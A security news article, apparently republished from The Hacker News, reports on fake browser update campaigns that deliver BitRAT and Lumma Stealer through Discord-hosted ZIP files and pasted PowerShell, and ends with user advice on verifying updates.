Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware
Fake Browser Updates Delivering Malware: A Growing Threat
Cybercriminals are employing fake browser updates to deliver a variety of malicious payloads, including remote access trojans (RATs) and information stealers such as BitRAT and Lumma Stealer. This tactic, previously associated with the SocGholish malware, has been identified in new attacks by cybersecurity firm eSentire.
How the Attack Works
The attack begins when a user visits a compromised website containing JavaScript that redirects them to a fake browser update page, such as “chatgpt-app[.]cloud”. The bogus update page prompts the user to download a ZIP file (“Update.zip”) hosted on Discord. Inside the ZIP file is a JavaScript file (“Update.js”) that executes PowerShell scripts to download further payloads, including BitRAT and Lumma Stealer, from remote servers.
The Malware
- BitRAT: A versatile RAT that allows attackers to harvest data, mine cryptocurrency, download additional binaries, and remotely control the infected systems.
- Lumma Stealer: A commodity information stealer available for purchase, capable of capturing data from web browsers, crypto wallets, and other sensitive information.
See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses
Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.
Distribution via Discord
Threat actors often use Discord as a distribution channel for malware. Bitdefender recently reported over 50,000 dangerous links circulating on Discord, spreading malware, phishing campaigns, and spam. The use of Discord in these fake update attacks demonstrates the platform’s exploitation by cybercriminals.
New Attack Variants
A recent report from ReliaQuest highlighted a variant of the ClearFake campaign that tricks users into copying and pasting malicious PowerShell code. This tactic involves a deceptive website that instructs users to fix a display issue by installing a root certificate and running obfuscated PowerShell commands, ultimately downloading and executing Lumma Stealer.
Rise in Lumma Stealer Activity
Lumma Stealer has become increasingly prevalent, with significant growth in logs listed for sale on the dark web. Its popularity among cybercriminals is attributed to its high success rate in infiltrating systems and exfiltrating data undetected.
Trending: Offensive Security Tool: Genzai
Broader Implications
The use of fake browser updates and other deceptive tactics underscores the evolving sophistication of cyberattacks. Users must remain vigilant, verify the authenticity of software updates, and scrutinize any instructions involving command-line scripts or root certificates.
The rise of fake browser update schemes highlights the need for robust cybersecurity practices. This report emphasizes the importance of verifying software sources and being cautious of unsolicited updates and instructions, particularly those involving script execution or sensitive changes to system settings.
Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]
Source: thehackernews.com
Recent News
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
